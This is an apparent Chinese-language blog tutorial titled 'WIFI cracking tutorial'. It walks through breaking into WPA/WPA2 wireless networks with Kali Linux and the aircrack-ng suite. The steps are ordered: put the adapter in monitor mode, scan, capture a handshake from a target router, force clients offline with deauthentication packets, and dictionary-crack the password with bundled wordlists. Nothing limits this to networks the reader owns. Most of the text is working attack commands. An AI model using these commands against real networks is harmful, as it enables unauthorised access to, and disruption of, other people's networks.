破解WIFI教程

  • 2020 年 3 月 28 日
  • 筆記

今日主題:如何破解WIFI

準備工具

  • 筆記型電腦一台
  • usb無線網卡【我用的是小米的】
  • kali系統【可以在虛擬機里裝,建議用2019年及以下版本】

VMware Workstation15虛擬機安裝

可以參考https://www.jianshu.com/p/552179808ebf

kali安裝

可以參考https://www.cnblogs.com/changjue/p/11244585.html

WIFI加密方式

1. WEP(有線等效加密)——採用WEP64位或者128位數據加密。

2.WPA-PSK[TKIP]———採用預共享秘鑰的WI-FI保護訪問,採用WPA-PSK標準加密技術,加密類型為TKIP。

3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允許客戶端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。

打開虛擬機,插入usb網卡,把網卡放到虛擬機

桌面右鍵,選擇Open in Terminal打開終端

顯示網卡資訊

airmon-ng  

開啟網卡監控

airmon-ng start wlan0  


用ifconfig命令查看一下網卡資訊

ifconfig  

可以看到網卡的名字已經變了

掃描WIFI訊號

airodump-ng wlan0mon  

拿到握手包

 airodump-ng -w freedom -c 11 -–bssid  44:97:5A:F2:9E:B0 wlan0mon --ignore-negative-one  

解釋:

-c:指定信道[ch]

-w:指定抓去握手包的存放位置或者名字,freedom是一會抓去的握手包的名字

--bssid:指定路由器的MAC

再開一個終端輸入命令

aireplay-ng -0 10 -a 路由器MAC -c 客戶機MAC wlan0mon – -ignore-negative-one  

使用airplay-ng工具強制斷開已經連接到wifi的設備重新連接路由器,來進行抓去數據包

解釋:

-0:指定發送反認證包的個數(阿利伯數字0)

-a:指定路由器的MAC

-c:指定客戶機的MAC


出現下圖就是抓取成功

破解握手包

aircrack-ng  -w dict freedom-*.cap  

dict:字典的名字

freedom-*.cap:握手包

破解成功

補充

  • 系統自帶了密碼字典,我用的是我自己的

字典位置如下:

/usr/share/john/password.lst  /usr/share/wfuzz/wordlist  /usr/share/ wordlists/rockyou.txt  

最後一個路徑下的文件默認是壓縮的,可以通過以下命令解壓

  • 反向認證的原理是讓其中一個客戶端下線,然後他再次連接,就可以獲取握手包

  • 訊號掃描結束或者進程終止:ctrl+c